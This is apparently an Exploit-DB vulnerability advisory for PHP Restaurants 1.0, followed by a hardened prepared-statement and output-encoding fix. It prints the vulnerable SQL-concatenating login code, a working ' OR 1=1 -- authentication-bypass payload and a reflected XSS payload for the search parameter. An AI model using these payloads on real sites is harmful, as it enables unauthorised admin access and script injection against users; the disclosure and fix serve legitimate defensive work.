Vendor: PHP Restaurants
Author: Or4nG.M4n
CVSS: 7.4 (HIGH)
Type: SQL Injection & Cross Site Scripting (XSS)
CWE: 89
Product Name: PHP Restaurants
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE:
CPE: a:jcwebhole:php_restaurants:1.0
Metasploit:
Other Scripts:
Platforms Tested:
Date: 2023

PHP Restaurants 1.0 – SQLi Authentication Bypass & Cross Site Scripting (XSS)

A vulnerability exists in the PHP Restaurants 1.0 software which allows an attacker to bypass authentication and perform Cross Site Scripting (XSS) attacks. The vulnerability is due to the lack of input validation in the login function of the functions.php file, which concatenates the submitted email and password straight into the SQL query. An attacker can exploit this by sending a specially crafted request to the login.php page with an email and password parameter containing an SQL injection payload, bypassing authentication and gaining access to the admin page. Additionally, the index.php page writes the search parameter into the page unescaped, so a specially crafted request with a search parameter containing an XSS payload executes attacker-controlled JavaScript in the victim's browser, in the context of the application.

Mitigation:

Input validation should be implemented to prevent SQL injection and Cross Site Scripting (XSS) attacks. Additionally, the application should be updated to the latest version.

Exploit-DB raw data:

# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS)
# Google Dork: None
# Date: 4/26/2023
# Exploit Author: Or4nG.M4n
# Vendor Homepage: https://github.com/jcwebhole
# Software Link: https://github.com/jcwebhole/php_restaurants
# Version: 1.0


functions.php

function login(){
    global $conn;
    $email = $_POST['email'];
    $pw = $_POST['password'];

    // <-- there is no filter to secure the SQL query: the email and password
    //     parameters are concatenated straight into the statement
    $sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` = '".md5($pw)."'";
    $result = $conn->query($sql);
    if ($result->num_rows > 0) {
        while($row = $result->fetch_assoc()) {
            setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day
            header('location: index.php');
        }
    } else {
        header('location: login.php?m=Wrong Password');
    }
}

Login bypass at the admin page /rest1/admin/login.php

email & password : ' OR 1=1 --             <- add a [space] at the end of the payload

Cross site scripting on the main page /index.php

xhttp.open("GET", "functions.php?f=getRestaurants<?php
  if(isset($_GET['search'])) echo '&search='.$_GET['search']; // <-- here we can insert our XSS payload
?>
  ", true);
xhttp.send();

</script> <-- when you insert your payload, don't forget to add </script>, like:

xss payload : </script><img onerror=alert(1) src=a>
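The following is an added example, not code from the PHP Restaurants project or from the advisory author. It shows the hardened form of both spots described above: login() rewritten to use a mysqli prepared statement so the email and password values are never parsed as SQL, and the search parameter built with http_build_query() and json_encode() before it is written into the <script> block in index.php. It assumes $conn is a mysqli connection (as in the original functions.php) and keeps the project's md5() password column so existing rows keep working; the names login_hardened() and get_restaurants_js() are mine.

```php
<?php
// Added example, not the PHP Restaurants project's own code. Assumes $conn is a
// mysqli connection (as in the original functions.php) and that the `users`
// table still stores md5() hashes in its `password` column.

function login_hardened(mysqli $conn): void {
    $email = $_POST['email'] ?? '';
    $pw    = $_POST['password'] ?? '';
    // Kept only for compatibility with the existing column; new code should
    // store password_hash() output and check it with password_verify().
    $hash  = md5($pw);

    // A prepared statement sends the SQL text and the values separately, so a
    // value such as "' OR 1=1 -- " is compared as a literal email address and
    // never reaches the SQL parser as syntax.
    $stmt = $conn->prepare(
        "SELECT `id` FROM `users` WHERE `email` = ? AND `password` = ? LIMIT 1"
    );
    $stmt->bind_param('ss', $email, $hash);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() needs mysqlnd (the default driver)
    $stmt->close();

    if ($row) {
        setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // same cookie as the original
        header('Location: index.php');
    } else {
        header('Location: login.php?m=Wrong+Password');
    }
    exit;
}

// Builds the JavaScript string literal for the getRestaurants request in index.php.
// http_build_query() percent-encodes the search value, so "<", ">", quotes and "&"
// from the request cannot change the URL or close the surrounding "</script>";
// json_encode() with the HEX flags then escapes the remaining "&" and quotes so
// the result is a JavaScript string literal that is safe inside a <script> block.
function get_restaurants_js(array $get): string {
    $params = ['f' => 'getRestaurants'];
    if (isset($get['search'])) {
        $params['search'] = (string) $get['search'];
    }
    $url = 'functions.php?' . http_build_query($params);
    return json_encode($url, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// Constructed check when run from the command line: the advisory's own payload
// comes back as an inert, percent-encoded URL literal.
if (PHP_SAPI === 'cli') {
    echo get_restaurants_js(['search' => '</script><img onerror=alert(1) src=a>']), "\n";
}
```

In index.php the request line becomes `xhttp.open("GET", <?= get_restaurants_js($_GET) ?>, true);`, replacing the raw echo of $_GET['search']. The prepared statement fixes the bypass because the comparison is done on values, not on SQL text, and functions.php on the server side (getRestaurants) receives the search term exactly as the user typed it after the browser decodes the URL, so the application's own behaviour is unchanged.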